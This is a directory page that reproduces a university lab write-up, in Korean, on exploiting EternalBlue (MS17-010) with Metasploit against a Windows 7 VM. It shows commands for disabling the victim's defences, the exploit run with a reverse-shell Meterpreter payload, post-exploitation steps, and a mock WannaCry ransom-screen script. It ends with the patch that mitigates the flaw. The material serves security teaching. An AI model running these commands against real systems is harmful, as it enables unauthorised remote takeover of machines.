Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EternalBlue-Exploit-Demonstration — Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment. | Kitploit
도구/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationPost-ExploitationMalware AnalysisCTFPenetration TestingLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment.

Red Teaming
Labs & Practice
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

저장소 보기
3개월 전아직 검토되지 않음
공유

EternalBlue 익스플로잇 데모 (MS17-010)

CVE-2017-0144 (EternalBlue)를 Metasploit을 사용하여 취약한 Windows 7 시스템에서 익스플로잇하고 Meterpreter를 통해 SYSTEM 수준 접근을 달성하는 사이버 보안 실습입니다.

이 프로젝트는 또한 WannaCry 스타일의 랜섬웨어 공격(안전 데모)을 시뮬레이션하고 MS17-010 보안 패치를 사용한 완화 방법을 보여줍니다.


모듈 정보

모듈: CSCM828 보안 취약점 및 침투 테스팅

학생:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

대학: Swansea University


리소스 및 다운로드

  1. MS17-010 EternalBlue SMB 원격 Windows 커널 풀 손상
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 보안 업데이트)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (가상 머신 다운로드)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium 영어 x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


1. 개요

이 실습은 다음을 보여줍니다:

  • SMB 취약점(MS17-010) 원격 익스플로잇
  • EternalBlue를 통한 커널 수준 접근
  • Meterpreter 세션 수립
  • 사후 익스플로잇 기술
  • WannaCry 스타일 랜섬웨어 시뮬레이션 (안전)
  • 패치를 통한 완화

2. 실습 환경

요구 사항

  • VMware Workstation / VirtualBox
  • 최소 8GB RAM

공격자 머신

  • Kali Linux
  • Metasploit Framework

피해자 머신

  • Windows 7 SP1 x64 (패치되지 않음)

네트워크

  • 호스트 전용 / NAT (격리된 환경)
  • 두 머신이 통신 가능한지 확인

⚠️ 이 실습은 완전히 격리된 환경에서 수행되어야 합니다.


3. 피해자 설정 (Windows 7)

관리자 명령 프롬프트에서 실행:

방화벽 비활성화

root@kitploit:~
netsh advfirewall set allprofiles state off

SMB 포트 확인

root@kitploit:~
netstat -an | findstr :445

업데이트 비활성화 (실습 안정성을 위해)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. 공격자 설정 (Kali Linux)

연결 확인

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. 익스플로잇 단계

1단계: 대상 스캔

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

예상 결과:

  • 호스트가 취약함

2단계: 익스플로잇 실행

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

3단계: 접근 확인

root@kitploit:~
meterpreter > getuid

예상 결과:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. 사후 익스플로잇

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

안정적인 마이그레이션

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry 시뮬레이션 (안전 데모)

페이로드 생성 (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

업로드 및 실행

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. 완화 (패치 데모)

1단계: 패치 다운로드

  • 방문: https://www.catalog.update.microsoft.com/
  • 검색: KB4012212 Windows 7 x64
  • .msu 파일 다운로드

2단계: 패치 설치

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

3단계: 재시작

root@kitploit:~
shutdown /r /t 0

4단계: 패치 확인

root@kitploit:~
systeminfo | findstr KB4012212

5단계: 익스플로잇 재실행

예상 결과:

  • 익스플로잇 실패
  • Meterpreter 세션 없음

6단계: Nmap으로 확인

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

예상 결과:

  • 취약하지 않음

9. 문제 해결

문제해결 방법
익스플로잇 실패연결 확인
세션 없음방화벽 비활성화
세션 종료익스플로잇 재시도
창이 보이지 않음explorer.exe로 마이그레이션

10. 윤리적 고려 사항

이 프로젝트는 다음 조건에서 수행됩니다:

  • 통제된 실습 머신에서만
  • 완전히 격리된 네트워크에서
  • 교육 목적으로만

무단 사용은 다음을 위반합니다:

  • 영국 컴퓨터 오용법 1990

11. 결론

이 실습은 다음을 보여줍니다:

  • EternalBlue를 사용한 실제 SMB 익스플로잇
  • Windows 7의 SYSTEM 수준 손상
  • 랜섬웨어 공격 시뮬레이션 (안전)
  • 적시 패치의 중요성
도구 다운로드